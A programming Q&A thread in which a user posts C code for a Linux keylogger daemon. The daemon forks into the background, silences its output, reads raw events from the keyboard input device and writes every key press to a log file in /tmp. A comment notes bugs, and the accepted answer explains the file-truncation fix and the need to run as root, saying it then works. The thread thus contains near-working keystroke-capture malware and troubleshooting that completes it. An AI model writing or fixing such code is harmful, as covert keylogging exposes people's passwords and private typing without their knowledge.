# Daemon opens a file in RO mode only

Tags: files, c, signals

I am trying to write a kind of keylogger myself. I don't know if my logic of developing a keylogger is good or not but I have thought of doing it the following way.
First a daemon is created, and to get the keystroke events, /dev/input/by-path/platform-i8042-serio-0-event-kbd is accessed and the obtained data is written to a file.
The code will follow down but the problem I have here is that the file I want to write to is opened in RO mode and I can't write to it though the daemon runs in background.

```
#include <stdio.h>
#include <fcntl.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
#include <termios.h>
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <linux/input.h>

#define RUNNING_DIR "/tmp"
#define LOCK_FILE "exampled.lock"
#define LOG_FILE "exampled.log"
//#define TEST_FILE "testd.txt"

static const char *const evval[3] = {
    "RELEASED",
    "PRESSED ",
    "REPEATED"
};

void log_message(char* filename, char* message)
{
    FILE *logfile;
    logfile = fopen(filename, "a");
    if(!logfile) return;
    fprintf(logfile, "%s\n", message);
    fclose(logfile);
}


void signal_handler(sig)
int sig;
{
    switch(sig)
    {
        case SIGHUP:// not relevant
            log_message(LOG_FILE, "hangup signal catched");
            break;
        case SIGTERM:// not relevant
            log_message(LOG_FILE, "terminate signal catched");
            exit(0);
            break;
        case SIGTTIN: // not relevant
            log_message(LOG_FILE, "from sigttin");
            break;
        case SIGTTOU:// only this is relevant here
            poll_kbd();
            break;
    }
}

int poll_kbd()
{
    const char *dev = "/dev/input/by-path/platform-i8042-serio-0-event-kbd";

    struct input_event ev;
    int n;
    int fd;
    FILE* f;
    f = fopen(LOG_FILE, "w");
    fd = open(dev, O_RDWR); 
    if (fd == -1) {
        fprintf(stderr, "Cannot open %s: %s.\n", dev, strerror(errno));
        return EXIT_FAILURE;
    }

    while (1) {
        n = read(fd, &ev, sizeof ev);
        if (n == (ssize_t)-1) {
            if (errno == EINTR)
                continue;
            else
                break;
        } else
        if (n != sizeof ev) {
            errno = EIO;
            break;
        }

        if (ev.type == EV_KEY && ev.value >= 0 && ev.value <= 2){
            fprintf(f, "%s 0x%04x (%d)\n", evval[ev.value], (int)ev.code, (int)ev.code);
        }
    }

}

void daemonize()
{
    int i, lfp;
    char str[10];

        if(getppid()==1) return;  // already a daemon, pid1 for init

        i = fork();
        if(i<0) exit(1); // fork error
        if(i>0) exit(0); // parent exits

        // child daemon continues
        setsid(); // obtain a new process group
        for (i=getdtablesize();i>=0;--i) close(i); // close all descriptors

        i =  open("/dev/null", O_RDWR); dup(i); dup(i); // handle standard IO
        umask(027); // set newly created file permissions
        chdir(RUNNING_DIR); // change running dir
        if (lfp<0) exit(1); // cannot open
        if (lockf(lfp, F_TLOCK, 0) < 0) exit(0); // cannot lock

        // first instance continues
        sprintf(str, "%d\n", getpid());
        write(lfp, str, strlen(str)); // record pid to lockfile
        signal(SIGCHLD, SIG_IGN); // ignore child
        signal(SIGTSTP, SIG_IGN); // ignore tty signals

        signal(SIGHUP, signal_handler); // catch hangup signal
        signal(SIGTERM, signal_handler); // catch kill signal
        signal(SIGTTIN, signal_handler);
        signal(SIGTTOU, signal_handler);
}

main()
{
    daemonize();
    while(1)
    {
        //the signal is raised to envoke the keyboard input detection function
        raise(SIGTTOU);
        sleep(1);
    }
}
```

Can anyone please help me with this, what is going wrong. Any suggestions are highly appreciated.
Thank you.

Comment: Run the main loop in the signal handler context???  And it refers undefined variable `lfp` in `daemonize()`...  You'd better read [APUE](http://www.apuebook.com/) or other tutorials on writing a daemon.

Answer (score 0, accepted):

You're starting out too big. Starting out with small pieces of code that you've made sure work is better. Why start with a daemon right away, and why that weird signalling to invoke `poll_kbd`. In C, you should be checking error codes too.

Rant finished.

Now why it's not working:
This >>`f = fopen(LOG_FILE, "w");` **truncates** the log file in each `kbd_poll` invocation.

Change it to `"a"` and make sure you run the script as `root` (so that you have read permissions to `"/dev/input/by-path/platform-i8042-serio-0-event-kbd"`--you'll never even see that error after your `deamonize()` function redirected `stderr` to `/dev/null`). Then it might work (does for me).